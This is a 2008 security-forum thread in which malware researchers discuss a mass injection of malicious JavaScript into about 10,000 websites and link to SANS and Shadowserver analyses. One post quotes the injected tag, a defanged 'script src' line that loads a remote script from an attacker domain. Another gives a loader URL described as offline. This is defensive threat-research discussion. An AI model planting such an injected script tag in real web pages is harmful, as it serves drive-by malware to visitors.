Author Topic: 2117966.net fuckjp.js  (Read 7462 times)

0 Members and 1 Guest are viewing this topic.

March 14, 2008, 03:58:34 pm
Read 7462 times

cjeremy

  • Special Members
  • Full Member

  • Offline
  • *

  • 58
    • sudosecure
Saw this on SANS this morning: http://isc.sans.org/diary.html?storyid=4139  and I know Steven Adair from the Shadow Server Foundation... and he is a really sharp guy that posted more details here: http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313  and his personal blog is here: http://www.securityzone.org/

Doing a Google search for fuckjp.js looks like the 10,000 infected websites may be fairly accurate.

--jeremy

March 14, 2008, 04:03:12 pm
Reply #1

sowhat-x

  • Guest
Excellent info - thanks!  :)

March 14, 2008, 04:03:51 pm
Reply #2

cjeremy

  • Special Members
  • Full Member

  • Offline
  • *

  • 58
    • sudosecure
of should have added this:

Code: [Select]
<script src=hxxp://www.2117966.net/fuckjp.js></script>
is what I have been seeing from my google search results....

March 14, 2008, 05:02:57 pm
Reply #3

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
This is giving a 404 at the moment. Anybody have a copy of fuckjp.js or fuckjp0.js ?

March 14, 2008, 05:13:22 pm
Reply #4

sowhat-x

  • Guest

March 26, 2008, 12:09:35 pm
Reply #5

sowhat-x

  • Guest
Here you go...it's officially 'leaked' now  ;)
http://www.0x000000.com/?i=534

March 26, 2008, 02:54:49 pm
Reply #6

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Might want to get Bobby to play with that for Malzilla ;)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

March 26, 2008, 06:00:39 pm
Reply #7

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Does not looks complete.
I'll try to trace back the variables, and get the URL if possible.

March 27, 2008, 12:56:02 am
Reply #8

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Looks like something along the lines of this, which is offline: a.njnk.net/cgi-bin/jl/jloader.pl?source=&system_id=none&qtver=0x